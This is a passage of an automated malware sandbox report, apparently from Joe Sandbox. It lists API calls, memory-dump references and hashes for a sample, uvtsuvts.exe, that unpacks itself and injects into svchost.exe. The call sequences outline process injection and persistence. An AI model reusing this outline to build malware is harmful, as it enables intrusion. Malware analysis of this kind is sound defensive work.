Function 02891404 Relevance: 5.1, APIs: 4, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0289146A
HeapFree.KERNEL32(00000000), ref: 02891471
GetProcessHeap.KERNEL32(00000000,?), ref: 0289147E
HeapFree.KERNEL32(00000000), ref: 02891485

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 351be23cc0a0ccdacb88385cc55a7cef63b75910353bb85c88dbb85d5f9ee99c
Instruction ID: a69be46a0159be0799ae0477f3ba5f8a26a2fb03416574bbe8a8427096728fc7
Opcode Fuzzy Hash: 351be23cc0a0ccdacb88385cc55a7cef63b75910353bb85c88dbb85d5f9ee99c
Instruction Fuzzy Hash: 8E1124B9D0420AABDF009FE988487DEFBFDAF09714F184566E509E3140D77595548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02891F56 Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02891CD5: GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02891CFD
Part of subcall function 02891CD5: RtlAllocateHeap.NTDLL(00000000), ref: 02891D04
Part of subcall function 02891CD5: lstrcpy.KERNEL32(00000000,00000000), ref: 02891D2D
Part of subcall function 02891CD5: GetProcessHeap.KERNEL32(00000000,?), ref: 02891DF6
Part of subcall function 02891CD5: HeapFree.KERNEL32(00000000), ref: 02891DFD
Part of subcall function 02891CD5: Sleep.KERNEL32(00001388), ref: 02891E08

GetProcessHeap.KERNEL32(00000000,?), ref: 02891FB4
HeapFree.KERNEL32(00000000), ref: 02891FBB
GetProcessHeap.KERNEL32(00000000,?), ref: 02891FC3
HeapFree.KERNEL32(00000000), ref: 02891FCA

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpy
String ID:
API String ID: 1268735806-0
Opcode ID: ae811a16f82c9bf460039b0c8d9888e005e7e564716949df271e61d3235b37ab
Instruction ID: 9849d717e3acccbbd736058970851232767620a62906cbf11af09980029753f0
Opcode Fuzzy Hash: ae811a16f82c9bf460039b0c8d9888e005e7e564716949df271e61d3235b37ab
Instruction Fuzzy Hash: DD01A5B9818309AFD710DFA6D848A5BBBE8FB4C314F08491EF599D2240E735E6148F96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: uvtsuvts.exePID: 1584, Parent PID: 1088COMMON

Executed Functions

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(fail 3), ref: 004010EE
NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00401122
OutputDebugStringA.KERNEL32(fail 2), ref: 00401133

Strings

fail 3, xrefs: 004010E9
Stop ok, xrefs: 00401180
fail 1, xrefs: 0040114E
fail 2, xrefs: 0040112E
Stop Err, xrefs: 00401187
Start, xrefs: 00401167

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: DebugOutputString$CreateProcessUser
String ID: Start$Stop Err$Stop ok$fail 1$fail 2$fail 3
API String ID: 976970837-1310772363
Opcode ID: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction ID: 243eedd8a4f49eb320fdfb0d7e1e77221009fbf540129bad84db16ccdf4411bb
Opcode Fuzzy Hash: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction Fuzzy Hash: 1421CA32605209BBCB055F94DD01E9A3F29EB0C725B214237FE00B61F4DA7AC960AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00422152 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,00421C5E), ref: 00422236
VirtualAlloc.KERNEL32(00000000,000001A9,00003000,00000040,00421C98), ref: 0042226D
VirtualAlloc.KERNEL32(00000000,0000B2A2,00003000,00000040), ref: 004222CD
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422303
VirtualProtect.KERNEL32(00400000,00000000,00000004,0042212D), ref: 00422412
VirtualProtect.KERNEL32(00400000,00001000,00000004,0042212D), ref: 00422439
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D), ref: 004224FF
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D,?), ref: 00422555
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422579

Memory Dump Source

Source File: 00000018.00000002.2701888444.0000000000421000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_421000_uvtsuvts.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 825025660836190913fdd1bb514e6233e9fadebdfec7ebde24a9587a44909d83
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 2FD19E72700100AFEB14EF54CD80F6277A6FF68310B890295ED0D9F26ADB74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 005A04F4 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,005A0000), ref: 005A05D8
VirtualAlloc.KERNELBASE(00000000,000001A9,00003000,00000040,005A003A), ref: 005A060F
VirtualAlloc.KERNELBASE(00000000,0000B2A2,00003000,00000040), ref: 005A066F
VirtualFree.KERNELBASE(005C0000,00000000,00008000), ref: 005A06A5
VirtualProtect.KERNELBASE(00400000,00009000,00000004,005A04CF), ref: 005A07B4
VirtualProtect.KERNEL32(00400000,00001000,00000004,005A04CF), ref: 005A07DB

Part of subcall function 005A03A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 005A03DA

VirtualProtect.KERNELBASE(00400000,?,00000002,005A04CF), ref: 005A08A1
VirtualProtect.KERNELBASE(00400000,?,00000002,005A04CF,?), ref: 005A08F7
VirtualFree.KERNELBASE(005C0000,00000000,00008000), ref: 005A091B

Memory Dump Source

Source File: 00000018.00000002.2702083695.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_5a0000_uvtsuvts.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 9b613606ef0c92f0990e23ddef52b87e5dae40f564bcef1198d20ac0246aac43
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: A7D17E727002019FEF11EF54CC80F557BA6FF59710B590294ED0D9F6AADB70A921CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,75539350,00003000,00000004), ref: 004015DB

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction ID: 5f65e376ed05142d156b79c11863de9d8c1410112659dc892d0819c29325736b
Opcode Fuzzy Hash: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction Fuzzy Hash: 71E0EC7556020CBBEF01CF90DD46FE977BCEB00715F104150B904D6090D775AB149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040160F Relevance: 1.5, APIs: 1, Instructions: 16
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(00401692,00000000,00000000,?,?), ref: 00401623

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction ID: 5a808b04aabe2117a938e4500ca1c1b9b1ef177e0b005ac0e652288855810eb1
Opcode Fuzzy Hash: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction Fuzzy Hash: 78D0C93255410DBFCF029FA4DD05CAA7B6EFB09211B004665FE29D2060D6329A34AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015EE Relevance: 1.5, APIs: 1, Instructions: 15
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(00000044,?,00000010,?,004010CF), ref: 00401602

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction ID: 2a43cff2ce15a73ccafebcd56fae5865f2d1f9501d48921ddcbb68ebc334f4a9
Opcode Fuzzy Hash: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction Fuzzy Hash: C1D0C93205410EBFDF019FA0DD05CEA3B6DEB05255B004121FA19D1060E632D6699B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70
sleepprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040100A
StrStrIA.KERNELBASE(00000000, /u), ref: 00401018
Sleep.KERNEL32(00001388), ref: 00401027
ExitProcess.KERNEL32 ref: 00401039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040107F
SetCurrentDirectoryW.KERNEL32(?), ref: 0040108C
lstrcatW.KERNEL32(?,?), ref: 004010A7
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010C3

Strings

/u, xrefs: 00401012

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: DirectoryProcess$CommandCreateCurrentExitLineSleepSystemlstrcat
String ID: /u
API String ID: 4042104365-4118749740
Opcode ID: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction ID: 96ee623e9da2e0af38eded0e061056f2ac1dfe5269435d034bd7705fbe78fb85
Opcode Fuzzy Hash: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction Fuzzy Hash: 36115472802619ABDB20AFB1DD0DEDE7B7CAF08705F10003AF605F20A5D63897458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB5 Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040157D,00000000,00000000,00000000,?,530C1AEE,004020E8), ref: 00401CC2
RtlFreeHeap.NTDLL(00000000,?,530C1AEE,004020E8), ref: 00401CC9

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction ID: de2e74cc2c5d9c26438789ecc4f5efd00e9e3bcaa0604652a6375203050d3e1d
Opcode Fuzzy Hash: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction Fuzzy Hash: E3C04C31449240FBEF015F909B0CB0A7ABDAB84743F008468F149A11A486748944DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401C79 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,?,00401D53,00001000,00000000,00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C7F
RtlAllocateHeap.NTDLL(00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C86

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction ID: bbb82e670732032ebf8e303bc8a39f8b906a07d9cff939e05880545c35f94fa9
Opcode Fuzzy Hash: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction Fuzzy Hash: 9EB00275546240EBDE416FE59F0DA097E7DBB84743F008454B349E5064CA758514DB25

Uniqueness

Uniqueness Score: -1.00%

Function 005A03A1 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 005A03DA

Memory Dump Source

Source File: 00000018.00000002.2702083695.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_5a0000_uvtsuvts.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: d01b67735db5a20c22eb43233b34bb1ab1f486084014715de57c60eecb02d768
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: B401B573A101046BEF208E19DC40B6F7B59FFC6720F299D26E905EB281C574DC0245A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401593 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00401442,00401295), ref: 004015AA

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction ID: 98ea57f8acb340bf8185d7c41957bfe50ebb8c53553d8a1b8998a7004bdb3259
Opcode Fuzzy Hash: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction Fuzzy Hash: 47D05E33C0830C5ACB04EBF19A0E8CD77FC9B0C214F1004A6E505B2080FA76EA5883A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401264 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000, /p=,00401033,00000000), ref: 0040126D
StrToIntA.SHLWAPI(-00000004), ref: 0040127B
GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe,00000104), ref: 004012A1

Strings

C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe, xrefs: 0040129A
/p=, xrefs: 00401264

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /p=$C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe
API String ID: 514040917-1512912830
Opcode ID: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction ID: a97e36b21e4f6c4b508bbe1c7bc1ce47f756939332ff9af57f8a63180c09d7ad
Opcode Fuzzy Hash: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction Fuzzy Hash: EAE048B068130177EA502F719E0FB156A985B08B4FF544476BA45F41F5DAFCC241451D

Uniqueness

Uniqueness Score: -1.00%

Function 00401305 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,0040128B), ref: 0040130B
RtlAllocateHeap.NTDLL ref: 00401387

Strings

NTDLL.DLL, xrefs: 00401306

Memory Dump Source

Source File: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.2701680677.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701723367.0000000000402000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701744454.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2701766888.0000000000404000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_400000_uvtsuvts.jbxd

Yara matches

Similarity

API ID: AllocateHandleHeapModule
String ID: NTDLL.DLL
API String ID: 3205619-1613819793
Opcode ID: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction ID: 661fe251d33bcd873fe0306d0fa480983da9c30ce6244cc3b298440f3ea03910
Opcode Fuzzy Hash: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction Fuzzy Hash: 5E213EA5B9079479E13025761E8EF2759AD85E6F99360817FBB04B21D6D8FC4C04C06C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 3712, Parent PID: 1584COMMON

Executed Functions

Function 02B12BA4 Relevance: 3.1, APIs: 2, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02B12BDA
NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02B12C23

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d9976c9be00562bb664816ae8408484c6575a0f700daac533ccb51a5de192c91
Instruction ID: 7d3dc672b1ac016f7331d09c74bf937d472a90c484a9d9a15f2d0d16930775a9
Opcode Fuzzy Hash: d9976c9be00562bb664816ae8408484c6575a0f700daac533ccb51a5de192c91
Instruction Fuzzy Hash: 6011CA39910115AFCB09CF9CC855EE977B8FF48324F1542EDE9254B291DB31AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B1338D Relevance: 19.7, APIs: 13, Instructions: 156
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,0000011C), ref: 02B133BE
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 02B133E0
GetLastError.KERNEL32 ref: 02B133E2
GetProcessHeap.KERNEL32(00000008,?), ref: 02B13401
RtlAllocateHeap.NTDLL(00000000), ref: 02B13408
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,?), ref: 02B13428
GetSidIdentifierAuthority.ADVAPI32(?), ref: 02B13448
GetSidSubAuthorityCount.ADVAPI32(?), ref: 02B1346B
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02B13480
GetSidSubAuthority.ADVAPI32(?,?), ref: 02B13497
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02B1351A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B13527
HeapFree.KERNEL32(00000000), ref: 02B1352E

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: AuthorityHeap$ProcessToken$Information$AllocateChangeCloseCountErrorFindFreeIdentifierLastNotificationOpen
String ID:
API String ID: 3355550324-0
Opcode ID: e3d44e3b8f9b636b99f7814ae14bcc9a1803057f1286c13695c9258b487b4fdd
Instruction ID: 3733ff4ce11b91cf219be8192b048715cc738dd97d5b2985c4f5ae86ccdb57e8
Opcode Fuzzy Hash: e3d44e3b8f9b636b99f7814ae14bcc9a1803057f1286c13695c9258b487b4fdd
Instruction Fuzzy Hash: 5F51CF315483019FD7128F28C84AB6ABFE8FF46754F9849C8F488C3151EB31D548DB62

Uniqueness

Uniqueness Score: -1.00%

Function 02B13555 Relevance: 15.1, APIs: 10, Instructions: 76
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02B13570
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02B13585
GetLastError.KERNEL32 ref: 02B1358B
GetProcessHeap.KERNEL32(00000008,00000001), ref: 02B135A1
RtlAllocateHeap.NTDLL(00000000), ref: 02B135A8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02B135C1
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02B135CF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02B135F0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B135FD
HeapFree.KERNEL32(00000000), ref: 02B13604

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessToken$Information$AllocateAuthorityChangeCloseErrorFindFreeLastNotificationOpen
String ID:
API String ID: 1063018014-0
Opcode ID: 0366c72a722f131b6d35cf971e5c5a2cb047eccf1d113a218650a0a15a3da4d2
Instruction ID: a09473c1b9254ccf48e5afd129aa85cd0ef9288a4baf98a44faa60cb8055a1e3
Opcode Fuzzy Hash: 0366c72a722f131b6d35cf971e5c5a2cb047eccf1d113a218650a0a15a3da4d2
Instruction Fuzzy Hash: 9B214C31940204ABEB218B95DC0DBAEFAB9FB41B96F9405F4F501A7090DB318A50EA60

Uniqueness

Uniqueness Score: -1.00%

Function 02B12DAF Relevance: 12.1, APIs: 8, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,02B151B9,?,02B170E8,00000000,00000000,?), ref: 02B12DC8
GetFileSize.KERNEL32(00000000,00000000,?,?,02B151B9,?,02B170E8,00000000,00000000,?,00000000), ref: 02B12DDC
CloseHandle.KERNEL32(00000000,?,02B151B9,?,02B170E8,00000000,00000000,?,00000000), ref: 02B12E4D

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: a6151e67c00772317cbeaa4106d07d103a7a6d872430b83e6c6609e2ff9803ad
Instruction ID: 2a7291991e110bb34cf45cec06cf067cf9d8a036c6510957bb1e3eeb5e861b20
Opcode Fuzzy Hash: a6151e67c00772317cbeaa4106d07d103a7a6d872430b83e6c6609e2ff9803ad
